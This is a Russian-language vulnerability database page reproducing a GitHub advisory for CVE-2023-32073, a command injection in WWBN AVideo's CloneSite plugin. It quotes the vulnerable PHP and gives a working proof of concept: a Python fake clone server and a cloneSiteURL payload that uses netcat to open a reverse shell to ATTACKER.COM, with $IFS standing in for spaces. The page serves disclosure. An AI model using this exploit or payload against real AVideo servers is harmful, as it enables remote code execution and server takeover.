Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-2mhh-27v7-3vcx

Опубликовано: 12 мая 2023
Источник: github
Github: Прошло ревью
CVSS3: 8.8

Описание

WWBN AVideo command injection vulnerability

WWBN AVideo Authenticated RCE

A command injection vulnerability exists at plugin/CloneSite/cloneClient.json.php which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854 which affects WWBN Avideo up to version 12.3

Vulnerable Code

/plugin/CloneSite/cloneClient.json.php

$json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile)); $json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles)); $json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles)); // get dump file $cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}"; $log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file"); exec($cmd . " 2>&1", $output, $return_val);

The $objClone->cloneSiteURL is not properly sanitized.

Exploit Proof-of-Concept

avidexploit.py

from http.server import BaseHTTPRequestHandler, HTTPServer import time hostName = "localhost" serverPort = 8080 class MyServer(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8")) if __name__ == "__main__": webServer = HTTPServer((hostName, serverPort), MyServer) print("Server started http://%s:%s" % (hostName, serverPort)) try: webServer.serve_forever() except KeyboardInterrupt: pass webServer.server_close() print("Server stopped.")

Run in command line

$ python3 avidexploit.py & $ ngrok tcp 8080 # optional if not running in VPS
  • Then get your public facing IP and Port. Enter a cloneSiteURL like the following then hit clone to achieve command injection
http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;#

It is important to not use white spaces for the exploit to work. Replace whitespace with $IFS when adding arguments to your RCE

poc

Credits

Ссылки

Пакеты

Наименование

wwbn/avideo

composer
Затронутые версииВерсия исправления

<= 12.4

Отсутствует

EPSS

Процентиль: 88%
0.0394
Низкий

8.8 High

CVSS3

CVE ID

CVE-2023-32073

Дефекты

CWE-77

Связанные уязвимости

nvd логотип

CVE-2023-32073

CVSS3: 8.8
nvd
больше 2 лет назад

WWBN AVideo is an open source video platform. In versions 12.4 and prior, a command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854, which affects WWBN AVideo up to version 12.3. This issue is patched in commit 1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3.

EPSS

Процентиль: 88%
0.0394
Низкий

8.8 High

CVSS3

CVE ID

CVE-2023-32073

Дефекты

CWE-77